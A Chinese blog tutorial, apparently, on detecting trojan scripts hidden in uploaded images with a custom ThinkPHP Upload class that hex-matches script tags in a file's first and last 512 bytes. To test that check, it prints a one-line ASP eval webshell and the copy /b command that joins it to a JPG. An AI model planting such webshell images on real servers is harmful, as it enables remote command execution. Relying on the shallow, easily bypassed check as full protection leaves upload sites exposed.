thinkphp 检测上传的图片中是否含有木马脚本
1.检测原理
要想检测图片中是否含有木马脚本,首先从制作原理来分析这种木马程序。这种木马程序是十六进制编码写的,图片的十六进制代码中主要包含<% ( ) %>、<? ( ) ?> 、<script | /script>, 所以我们可以通过检测十六进制代码来检测木马脚本。
2.解决方案
2.1编写Upload类
要想上传图片文件,我们要自己先定义一个上传文件的方法,然后方法中调用thinkphp中框架写好的Upload类,但是tp框架中的upload类没有检测木马图片的功能,所以我们可以自己写一个含有检测功能的upload类。
<?php /** +------------------------------------------------------------------------------ * Upload 文件上传类 +------------------------------------------------------------------------------ * @package Upload +------------------------------------------------------------------------------ */ class Upload { private static $image = null; private static $status = 0; private static $suffix = null; private static $imageType = array('.jpg', '.bmp','.gif','.png'); //允许的图片类型 private static $message = array( //文件上传错误信息 '0' => '没有错误发生,文件上传成功。', '1' => '上传的文件超过了 php.ini 中 upload_max_filesize 选项限制的值。', '2' => '上传文件的大小超过了 HTML 表单中 MAX_FILE_SIZE 选项指定的值。', '3' => '文件只有部分被上传。', '4' => '没有文件上传。', '5' => '未能通过安全检查的文件。', '6' => '找不到临时文件夹。', '7' => '文件写入失败。', '8' => '文件类型不支持', '9' => '上传的临时文件丢失。', ); //@ 开始执行文件上传 public static function start($feild = 'file') { if (!empty($_FILES)) { self::$status = $_FILES[$feild]['error']; if (self::$status > 0) return array('status' => self::$status, 'msg' => self::$message[self::$status]); self::$image = $_FILES[$feild]['tmp_name']; self::$suffix = strtolower(strrchr($_FILES[$feild]['name'], '.')); return array('status' => self::_upload(), 'path' => self::$image, 'msg' => self::$message[self::$status]); } else { return array('status' => self::$status, 'msg' => self::$message[self::$status]); } } //@ 私有 上传开始 private static function _upload($path = './upload/') { date_default_timezone_set('PRC'); $newFile = $path . date('Y/m/d/His') . rand(100, 999) . self::$suffix; //定义上传子目录 self::umkdir(dirname($newFile)); if (is_uploaded_file(self::$image) && move_uploaded_file(self::$image, $newFile)) { self::$image = $newFile; // 生成的新文件名 if (in_array(self::$suffix, self::$imageType)) // 判断上传类型是否符合规定 return self::checkHex(); // 返回木马脚本检测的返回值 else return self::$status = 0; } else { return self::$status = 9; } } //@ 私有 16进制检测 private static function checkHex() { if (file_exists(self::$image)) { $resource = fopen(self::$image, 'rb'); $fileSize = filesize(self::$image); fseek($resource, 0); //把文件指针移到文件的开头 if ($fileSize > 512) { // 若文件大于521B文件取头和尾 $hexCode = bin2hex(fread($resource, 512)); fseek($resource, $fileSize - 512); //把文件指针移到文件尾部 $hexCode .= bin2hex(fread($resource, 512)); } else { // 取全部 $hexCode = bin2hex(fread($resource, $fileSize)); } fclose($resource); /* 匹配16进制中的 <% ( ) %> */ /* 匹配16进制中的 <? ( ) ?> */ /* 匹配16进制中的 <script | /script> 大小写亦可*/
/* 核心 整个类检测木马脚本的核心在这里 通过匹配十六进制代码检测是否存在木马脚本*/
if (preg_match("/(3c25.*?28.*?29.*?253e)|(3c3f.*?28.*?29.*?3f3e)|(3C534352495054)|(2F5343524950543E)|(3C736372697074)|(2F7363726970743E)/is", $hexCode)) self::$status = 5; else self::$status = 0; return self::$status; } else { return self::$status = 9; } } //@ 私有 创建目录 private static function umkdir($dir) { if (!file_exists($dir) && !is_dir($dir)) { self::umkdir(dirname($dir)); @mkdir($dir); } } }
这个类配合自己定义的上传图片的方法 可以检测上传图片是否存在木马脚本
3.制作木马图片
3.1制作过程
1.随便找一张图片,名字改成1.jpg。
2.将<%eval request("keio")%> 存为1.php。
3.copy 1.jpg /b + 1.php /a 2.jpg 存为1.bat文件。
(具体操作方法:打开-运行-cmd,进入下面这个界面,然后cd 进入放置文件的路径,然后输入命令copy 1.jpg/b+1.php 2.jpg 然后回车就系统就会自动把这两个文件组合起来,形成一个含有木马脚本的图片。)
3.2查看图片
你可以用text文档打开2.jpg,就发现我们的一句话木马就写入到了图片中。
解释:
复制当前目录下的 1.jpg 图片和当前目录下的 1.php 文件并以ASCII代码的方式合并为2.jpg 图片
运行 1.bat 就会出现一个图片 2.jpg
而这个2.jpg就是已经做好的木马了
4.上传检测
我们将制作的木马图片上传,检测我们的十六进制检测木马脚本的方法是不是好使。
实践是检验真理的唯一途径,大家要手动做一张图片木马进行验证,本人亲测可以检测到。
有意见和建议的兄弟们,可以留言来交流,批评指正!谢谢
如果你使用出现问题,可以留言交流!